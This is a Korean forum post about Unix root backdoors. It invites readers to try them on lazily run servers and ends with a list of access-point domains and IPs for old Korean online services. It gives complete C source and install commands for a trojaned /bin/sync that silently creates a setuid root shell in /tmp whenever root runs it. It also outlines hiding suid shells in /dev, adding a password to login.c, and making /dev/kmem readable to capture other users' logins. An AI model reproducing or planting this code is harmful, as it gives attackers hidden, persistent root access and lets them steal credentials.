사이트 내 전체검색
백도어와 개구멍
로빈아빠
https://cmd.kr/server/849 URL이 복사되었습니다.

본문

백도어를 아십니까? 일명 뒷문이라고 하죠.
해커가 침투(?)해서 자신이 원하는 작업을 한후 차후에 또 접속하기위해
백도어를 설치하는 것입니다.
즉, 백도어란 ROOT의 관리자 모르게 자신에게 ROOT권한을 부여한
퍼미션을 열어두는 것이죠.

아래 설명하는것은 초보적인 것들이기에 웬만한 보안툴에는 다 잡히지만
게으른 관리자도 많으니 한번 해보시길...

예를 들어봅시다.

(1) 기초적인 것으로  /dev 디렉토리에 suid된 shell을 숨겨둡니다.
  /dev에는 많은 파일이 들어 있으므로 섣불리 ls해 보지는 않는다는
  인간적인 약점을 이용하는 것입니다.
(2) login을 다시 컴파일합니다.
  소스인 "login.c"에 특정 패스워드를 집어넣어 자신이 이것을 입력했을경우
  로그인이 되도록 하는것입니다.
  하지만 이것은 리눅스같이 소스가 공개되어 있는것은 가능하지만 SUN같은
  것은 좀 힘듭니다. 하지만 SUN도 소스가 어딘가에 있으니 불가능하지는
  않을듯...
(3) sync를 컴파일합니다.
#cat >sync.c
main()
{
  if (get_uid() == 0) {
      system("cp /bin/sh /tmp/.rootsh");
      system("chmod u+s /tmp/.rootsh");
  }
  sync();
}
^D
#cc -o sync sync.c
#cp sync /bin/sync
  이렇게 해 두면 루트가(또는 일정시간마다) sync가 수행될때마다
  /tmp에 .rootsh이 생성된다. 혹시 root가 알고 지웠을 경우라도
  sync가 바뀌었다는것을 모른다면 sync가 수행될때마다 계속 생길 것입니다.
(4) /dev/kmem을 읽기 가능한 상태로 만들어 둡니다.
  '/dev/kmem'이 읽기 가능하다면, 당신은 짧은 C프로그램을 사용하여
  다른 터미널의 입출력을 가로챌 수 있고 따라서 로그인 네임과 비번등
  모든것을 가로챌 수 있기때문이죠.
  '/dev/kmem'이 쓰기 가능이라면, user structure를 편집하여 당신의
  uid를 바꿀수 있습니다.


백도어 말구 개구멍이란게 있습니다.
개구멍이란 예를들어 천리안,하이텔 같은 서비스에서 인터넷으로
오고 갈수 있는지 등입니다.
이를 인바운딩 혹은 아웃바운딩 이라고 말합니다.
인바운딩이랑 인터넷에서 서비스사로 들어올수 있는 기능이고 아웃바운딩은
그 반대로 나갈수 있게 하는 것입니다.
현재 유료화된 인터넷 계정 서비스등을 사용한다면 모를까 그전에는
인바운딩 서비스 같은 것을 하는줄도 몰랐고 할수있다고 해도 접속도메인을
알수없게 했습니다.
개구멍이란 바로 그러한 접속 도메인을 일컿는것입니다.
다음과 같은것이 그러한 것입니다.

hitel.goldstar.co.kr
202.30.93.19
134.75.141.101
134.75.100.120

댓글목록

등록된 댓글이 없습니다.

1,139 (6/23P)

Search

Copyright © Cmd 명령어 18.216.142.24